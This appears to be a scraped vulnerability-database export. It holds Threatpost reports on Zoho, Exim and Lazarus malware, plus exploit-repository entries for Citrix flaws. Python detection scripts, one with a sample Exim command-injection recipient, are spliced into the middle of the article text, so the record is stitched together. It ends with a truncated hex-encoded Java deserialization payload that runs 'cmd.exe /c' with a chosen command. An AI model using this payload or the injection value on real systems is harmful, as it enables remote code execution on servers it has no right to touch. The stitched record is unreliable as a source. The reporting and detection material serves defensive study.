\u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nIn 2018, researchers found multiple critical flaws in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Before that, a large number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen using the Zoho online office suite: in one analysis, 40 percent of those spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. 
[Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/?utm_source=rss&utm_medium=rss&utm_campaign=critical-zoho-zero-day-flaw-disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-06T22:07:10", "description": "Microsoft is warning customers that some Azure installations are vulnerable to a recently disclosed critical Linux Exim mail server flaw that is under active attack.\n\nThe warning comes after a widespread worm campaign was [disclosed on Friday](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>), targeting a flaw in Exim, a mail transfer agent (MTA) that runs on Linux servers and receives, routes and delivers email messages from local users and remote hosts. The issue also affects Azure users: Linux virtual machines running Exim can be created through the Azure portal (a browser-based user interface to create VMs and their associated resources).\n\nIn an advisory, Microsoft said that Azure customers running virtual machines with Exim versions 4.87 through 4.91 are susceptible to the attack. 
Exim version 4.92 is not vulnerable.\n\n\u201cCustomers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs,\u201d said JR Aquino, manager for Azure Incident Response at Microsoft Security Response Center, in an [advisory posted over the weekend](<https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>). \u201cAs this vulnerability is being actively exploited by worm activity, [Microsoft] urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.\u201d\n\nAn attack on vulnerable systems could allow a malicious actor to gain remote command execution, take control of the victim machines, scan the internet for other machines to infect, and install a cryptominer.\n\nMicrosoft, for its part, said that while Network Security Groups offer \u201cpartial mitigation,\u201d vulnerable systems are still exposed if an attacker\u2019s IP address is permitted through them. A Network Security Group is a list of security rules for virtual machines that allow or deny network traffic to resources connected to Azure Virtual Networks.\n\n\u201cThere is a partial mitigation for affected systems that can filter or block network traffic via Network Security Groups (NSGs),\u201d its advisory said. \u201cThe affected systems can mitigate Internet-based \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker\u2019s IP Address is permitted through Network Security Groups.\u201d\n\nThe flaw stems from improper validation of the recipient address in the deliver_message() function in the server. 
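Two checks a defender would want at this point, written here as an added Python example rather than code from the article, from Microsoft or from the Exim project: a version-range test for the 4.87 through 4.91 window named above, and a scan of SMTP commands for a recipient whose local part carries Exim's `${...}` string-expansion syntax. That an unvalidated recipient address reaches Exim's string expander, and that public exploitation used the `${run{...}}` form, comes from the public write-up of the bug rather than from this article. The SMTP lines are constructed. The version test only sees the version string; distributions ship backported fixes without changing it, so a hit has to be confirmed against the package changelog, which is exactly why the advice to "apply the backported fix" matters.

```python
import re
from typing import List, Tuple

# Range the advisory names as affected (inclusive); 4.92 carries the fix.
AFFECTED_MIN = (4, 87)
AFFECTED_MAX = (4, 91)

# Exim string-expansion items look like ${item{...}}; ${run{cmd}} executes cmd.
# A legitimate recipient local part never contains "${", so its presence is the signal.
EXPANSION_ITEM = re.compile(r"\$\{")
RCPT_CMD = re.compile(r"^RCPT TO:\s*<(?P<addr>[^>]*)>", re.IGNORECASE)


def parse_exim_version(text: str) -> Tuple[int, int]:
    """Extract (major, minor) from a bare version ('4.91') or an SMTP banner
    such as '220 mx.example.test ESMTP Exim 4.91 Sat, 15 Jun 2019 ...'."""
    m = re.search(r"\bExim\s+(\d+)\.(\d+)", text) or re.match(r"\s*(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no Exim version in {text!r}")
    return int(m.group(1)), int(m.group(2))


def version_in_affected_range(text: str) -> bool:
    """True for 4.87..4.91. Backported fixes leave the version string unchanged,
    so True means 'verify against the package changelog', not 'confirmed vulnerable';
    False for 4.92 and later is reliable."""
    return AFFECTED_MIN <= parse_exim_version(text) <= AFFECTED_MAX


def suspicious_recipient(addr: str) -> bool:
    """True when the local part carries an expansion item. The split is on the
    last '@' so a quoted local part that itself contains '@' stays on the left."""
    local, sep, _domain = addr.rpartition("@")
    if not sep:          # no '@' at all: treat the whole string as the local part
        local = addr
    return bool(EXPANSION_ITEM.search(local))


def flag_rcpt_lines(lines: List[str]) -> List[str]:
    """Return recipient addresses from RCPT TO commands that look like expansion attempts."""
    hits = []
    for line in lines:
        m = RCPT_CMD.match(line.strip())
        if m and suspicious_recipient(m.group("addr")):
            hits.append(m.group("addr"))
    return hits


# Constructed SMTP transcript fragment (not a real capture).
SAMPLE_SMTP = [
    "EHLO client.example.test",
    "MAIL FROM:<alice@example.test>",
    "RCPT TO:<bob@example.test>",
    "RCPT TO:<${run{/usr/bin/id}}@localhost>",
    "RCPT TO:<carol@example.test>",
]

if __name__ == "__main__":
    print("banner 4.91 in affected range:", version_in_affected_range("220 mx ESMTP Exim 4.91"))
    print("4.92 in affected range:", version_in_affected_range("4.92"))
    print("flagged recipients:", flag_rcpt_lines(SAMPLE_SMTP))
```

The recipient check is the part worth wiring into a mail-gateway or IDS rule: it needs no knowledge of the Exim version and catches the attempt whether or not the target is patched, while the version check is only a triage aid for inventory.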
The vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was [publicly disclosed on June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) and affects Exim versions 4.87 to 4.91.\n\nExim runs almost 57 percent of the internet\u2019s email servers, and researchers said that currently more than 3.5 million servers are at risk from the attacks, which use a wormable exploit.\n\nThe sheer number of vulnerable systems has researchers, vendors and others urging users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim 4.92.\n\n\u201cAttackers have started probing for and experimenting with attacks against Exim systems vulnerable to CVE-2019-10149,\u201d Satnam Narang, senior research engineer with Tenable said in an email. \u201cSecurity researchers have observed active exploitation in the wild, one of which includes an attack resulting in permanent root access to vulnerable systems via SSH. It is critically important for those running Exim to upgrade to version 4.92 or apply the backported fix to vulnerable versions in order to prevent these newly discovered attacks from succeeding.\u201d\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. 
_** **_Join Threatpost and a panel of experts as they discuss how to manage the risk associated with this unique attack type, with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-17T15:02:52", "type": "threatpost", "title": "Microsoft Pushes Azure Users to Patch Linux Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T15:02:52", "id": "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D", "href": "https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:22:13", "description": "The North Korea-linked APT known as Lazarus Group has debuted an advanced, multipurpose malware framework, called MATA, to target Windows, Linux and macOS operating systems.\n\nKaspersky researchers uncovered a series of attacks utilizing MATA (so-called because the malware authors themselves call their infrastructure MataNet), involving the infiltration of corporate entities around the world in a quest to steal customer databases and distribute ransomware. The framework consists of several components, such as a loader, an orchestrator (which manages and coordinates the processes once a device is infected) and plugins. And according to artifacts in the code, Lazarus has been using it since spring 2018.\n\n\u201cMalicious toolsets used to target multiple platforms are a rare breed, as they require significant investment from the developer,\u201d explained Kaspersky analysts, in a report issued on Wednesday. \u201cThey are often deployed for long-term use, which results in increased profit for the actor through numerous attacks spread over time. 
In the cases discovered by Kaspersky, the MATA framework was able to target three platforms \u2013 Windows, Linux and macOS \u2013 indicating that the attackers planned to use it for multiple purposes.\u201d\n\nAs for victimology, known organizations hit by the MATA framework have been located in Germany, India, Japan, Korea, Turkey and Poland \u2014 indicating that the attacks cast a wide net. Moreover, those victims are in various sectors, and include a software development company, an e-commerce company and an internet service provider.\n\n\u201cFrom one victim, we identified one of their intentions,\u201d according to Kaspersky. \u201cAfter deploying MATA malware and its plugins, the actor attempted to find the victim\u2019s databases and execute several database queries to acquire customer lists. We\u2019re not sure if they completed the exfiltration of the customer database, but it\u2019s certain that customer databases from victims are one of their interests. In addition, MATA was used to distribute VHD ransomware to one victim.\u201d\n\n## **Windows Version**\n\nThe Windows version of MATA consists of several components, according to the firm: Most notably, a loader malware, which is used to load an encrypted next-stage payload; and the payload itself, which is likely the orchestrator malware.\n\n\u201cWe\u2019re not sure that the loaded payload is the orchestrator malware, but almost all victims have the loader and orchestrator on the same machine,\u201d the researchers explained.\n\nThe orchestrator loads encrypted configuration data from a registry key and decrypts it with the AES algorithm. Its purpose is to load various plugins \u2013 up to 15 of them. 
They perform various functions, including sending the command-and-control (C2) server information about the infected host, such as victim ID, internal version number, Windows version, computer name, user name, IP address and MAC address; creating an HTTP proxy server; executing code; manipulating files; and more.\n\nThe parent process that executes the loader malware is the WMI Provider Host process, which usually means the actor has executed malware from a remote host to move laterally, according to Kaspersky \u2013 meaning that additional hosts in the same network could also be infected.\n\n## **Non-Windows versions of MATA**\n\nA Linux version of the MATA orchestrator was seen in December, [uncovered by Netlab](<https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/>) and dubbed Dacls. It was characterized as a remote access trojan (RAT), bundled together with a set of plugins. Kaspersky has linked Dacls to MATA, with the Linux MATA version including both a Windows and a Linux orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server ([CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)) and a legitimate [socat tool](<http://www.dest-unreach.org/socat/>).\n\nNote that the Linux version of MATA has a logsend plugin. This plugin implements an interesting new feature, a \u201cscan\u201d command that tries to establish TCP connections to ports 8291 (used for administration of MikroTik RouterOS devices) and 8292 (\u201cBloomberg Professional\u201d software) on random IP addresses, excluding addresses belonging to private networks. Any successful connection is logged and sent to the C2. These logs might be used by attackers for target selection.\n\nThe macOS version of the orchestrator, meanwhile, was found in April, having been ported from the Linux version. 
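As an added illustration (not Kaspersky's or Threatpost's code), the Python below turns the Linux plugin's scan behaviour just described into a detection rule run over constructed flow records: an internal host that opens TCP connections to port 8291 or 8292 on several distinct non-private addresses is reported, while a host that only administers one MikroTik router on the LAN is not. The flow record format, the host addresses and the threshold are assumptions made for the example.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, List, Set

# Ports the plugin's "scan" command probes, per the Kaspersky report quoted above.
SCAN_PORTS = {8291, 8292}   # 8291: MikroTik RouterOS admin, 8292: Bloomberg Professional

# Ranges the scanner skips ("excluding addresses belonging to private networks"):
# RFC 1918 plus loopback and link-local. Listed explicitly instead of using
# ipaddress.is_private, which would also match the RFC 5737 documentation
# addresses that stand in for public hosts in the sample below.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_private(ip: str) -> bool:
    """True when ip falls inside one of PRIVATE_NETS."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE_NETS)


def parse_flow(line: str) -> dict:
    """Parse one constructed flow record: '<ts> <src_ip> <src_port> <dst_ip> <dst_port> <proto>'."""
    ts, src, _sport, dst, dport, proto = line.split()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "proto": proto.lower()}


def scanners(lines: List[str], threshold: int = 3) -> Dict[str, Set[str]]:
    """Return {src: destinations} for sources that reached at least `threshold`
    distinct public hosts on a scan port. Private destinations are ignored: the
    plugin never targets them, and an administrator reaching one MikroTik router
    on the LAN over 8291 is ordinary traffic that would otherwise trip the rule."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        rec = parse_flow(line)
        if rec["proto"] != "tcp" or rec["dport"] not in SCAN_PORTS:
            continue
        if is_private(rec["dst"]):
            continue
        seen[rec["src"]].add(rec["dst"])
    return {src: dsts for src, dsts in seen.items() if len(dsts) >= threshold}


# Constructed sample (not a real capture). RFC 5737 documentation addresses stand in
# for random public hosts. 10.0.0.7 behaves like the plugin; 10.0.0.9 only manages
# a router on the LAN.
SAMPLE_FLOWS = [
    "2020-07-01T10:00:01 10.0.0.7 51000 203.0.113.10 8291 tcp",
    "2020-07-01T10:00:02 10.0.0.7 51001 198.51.100.23 8292 tcp",
    "2020-07-01T10:00:03 10.0.0.7 51002 192.0.2.77 8291 tcp",
    "2020-07-01T10:00:04 10.0.0.7 51003 203.0.113.200 8292 tcp",
    "2020-07-01T10:00:05 10.0.0.7 51004 10.0.0.1 8291 tcp",
    "2020-07-01T10:00:06 10.0.0.7 51005 203.0.113.5 443 tcp",
    "2020-07-01T10:00:07 10.0.0.9 51010 10.0.0.1 8291 tcp",
    "2020-07-01T10:00:08 10.0.0.9 51011 10.0.0.1 8291 tcp",
]

if __name__ == "__main__":
    for src, dsts in scanners(SAMPLE_FLOWS).items():
        print(f"{src} probed {len(dsts)} public hosts on {sorted(SCAN_PORTS)}: {sorted(dsts)}")
```

Counting distinct public destinations rather than raw connection attempts is what separates the plugin's behaviour from a legitimate management client: the latter talks to a handful of known devices repeatedly, the former touches many random addresses once each, and most of those probes fail, so the rule should be fed connection attempts (SYNs), not only established sessions.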
It [was found hiding](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) in a trojanized macOS application based on an open-source two-factor authentication application named MinaOTP. Its plugin list is almost identical to the Linux version, except that it also contains a plugin named \u201cplugin_socks,\u201d responsible for configuring proxy servers.\n\n## **Links to Lazarus**\n\nLazarus Group, a.k.a. Hidden Cobra or APT 38, has been around since 2009. The APT has been linked to the highly destructive [WannaCry](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) attack that caused millions of dollars of economic damage in 2017, the [SWIFT banking attacks](<https://threatpost.com/bangladesh-bank-hackers-accessed-swift-system-to-steal-cover-tracks/117637/>), as well as the high-profile attack against [Sony Pictures Entertainment](<https://threatpost.com/f-b-i-mandiant-investigating-sony-pictures-breach/109645/>) in 2014. It even has [spawned a spinoff group](<https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/>), the entire mission of which is to steal money from banks to fund Lazarus\u2019 cybercriminal operations and the North Korean regime as a whole.\n\nLazarus is also constantly evolving: In December, it was seen hooking up with Trickbot operators, which run [a powerful trojan](<https://threatpost.com/trickbot-malware-now-targets-us-banks/126976/>) that targets U.S. banks and others. 
In May, it was seen [adding macOS spyware](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) to a two-factor authentication app; and earlier in July, it added [Magecart card-skimming code](<https://threatpost.com/lazarus-group-adds-magecart/157167/>) to its toolbag.\n\nKaspersky has linked the MATA framework to the Lazarus APT group through two unique file names found in the orchestrators: c_2910.cls and k_3872.cls, which have only previously been seen in several variants of the Manuscrypt malware, a known Lazarus tool. Previous research by Netlab also determined the connection between the Linux orchestrator/Dacls RAT and the APT.\n\n\u201cMoreover, MATA uses global configuration data including a randomly generated session ID, date-based version information, a sleep interval and multiple C2s and C2 server addresses,\u201d added the researchers. \u201cWe\u2019ve seen that one of the Manuscrypt variants (ab09f6a249ca88d1a036eee7a02cdd16) shares a similar configuration structure with the MATA framework. This old Manuscrypt variant is an active backdoor that has similar configuration data such as session ID, sleep interval, number of C2 addresses, infected date, and C2 addresses. 
They are not identical, but they have a similar structure.\u201d\n", "cvss3": {}, "published": "2020-07-22T16:43:44", "type": "threatpost", "title": "Lazarus Group Surfaces with Advanced Malware Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2020-07-22T16:43:44", "id": "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "href": "https://threatpost.com/lazarus-group-advanced-malware-framework/157636/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-23T23:33:45", "description": "# citrix_adc_netscaler_lfi_scan\n\n![alt text][citrix]\n\nThis Metas...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-12T13:37:53", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2021-10-10T19:00:30", "id": "92A57BC1-BAC9-5C0F-951A-E1FF05D87142", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, 
{"lastseen": "2022-03-23T23:33:48", "description": "# CVE-2020-8193-Citrix-Scanner\n\nScanning for CVE-2020-8193 - Aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-13T10:36:43", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2021-12-15T14:39:48", "id": "F775D2F3-FF1F-529F-B0F3-99AB6A801264", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-06T10:03:57", "description": "# check-your-pulse #\n\n[\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
2\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x04\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x25\\x63\\x6f\\x6d\\x2e\\x73\\x79\\x67\\x61\\x74\\x65\\x2e\\x73\\x63\\x6d\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x52\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5
b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0e\\x72\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x4c\\x69\\x6e\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x76\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x01\\x75\\x71\\x00\\x7e\\x00\\x20\\x00\\x00\\x00\\x03\\x74\\x00\\x07\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x74\\x00\\x02\\x2f\\x63\\x74\\x00'\r\n \r\n cleng = len(_cmd)\r\n java_payload += chr(cleng) + _cmd\r\n java_payload += 
'\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a'\r\n 